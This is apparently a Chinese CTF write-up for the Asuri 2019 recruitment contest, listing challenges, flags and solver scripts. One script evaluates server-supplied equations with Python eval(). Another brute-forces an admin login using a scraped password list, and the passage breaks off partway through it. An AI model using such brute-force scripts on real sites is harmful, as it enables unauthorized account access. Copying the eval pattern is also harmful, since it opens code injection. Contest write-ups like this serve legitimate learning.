Asuri 2019招新赛WriteUP
20191117
网址: http://139.9.212.218:8000/challenges
官方安排及WriteUP:
https://github.com/Kit4y/2019-Asuri-Recruitment-Src-and-wp
test
flag{this_is_test_flag}
misc-签到
base64解码即得到
flag{1_want_jiamus_p0wer}
baby-web-九曲十八弯
http://desperadoccy.club:39011/
base64解码
Asuri{view_source's_power}
快速计算
http://47.102.107.100:39012/
连续20次在1-2s内判断是否正确,即可得到flag。
import requests
import re
import time
s = requests.Session()
r = s.get("http://47.102.107.100:39012/")
for i in range(20):
time.sleep(1)
equation = re.findall(r'<div>(.*)=(.*)</div>', r.text)[0]
print(equation)
answer = eval(equation[0])
if answer == eval(equation[1]):
values = {
'answer': 'true'}
else:
values = {
'answer': 'false'}
r = s.post("http://47.102.107.100:39012/", data=values)
r.encoding = 'utf-8'
print(r.text)
Asuri{python_1s_th3_be3t_l4ngu4ge}
medium_web_justburp
http://139.9.212.218:39010/
查找网站目录下的文件
访问robots.txt
得到:
访问hint.php
得到一个文件
尝试以admin
作为用户名,用以上信息作为密码写脚本进行登录,
然而好像没有成功(有可能有成功的没看到???
难受了,现场写的时候脑乱了,把所有登录数据都打印出来了,然后没找到flag…
加一个if重新来就看到了惹emmm
爆破一波
# -*- coding:utf-8 -*-
import requests
s = requests.Session()
r = s.get("http://139.9.212.218:39010/index.php")
r.encoding = "utf-8"
print(r.text)
with open('name-pass.txt', 'r') as file:
contents = file.read().split()
# print(contents)
passwords = contents
for password in passwords:
values = {
'name': 'admin',
'password': password}
r = s.get("http://139.9.212.218:39010/index.php", params=values)
r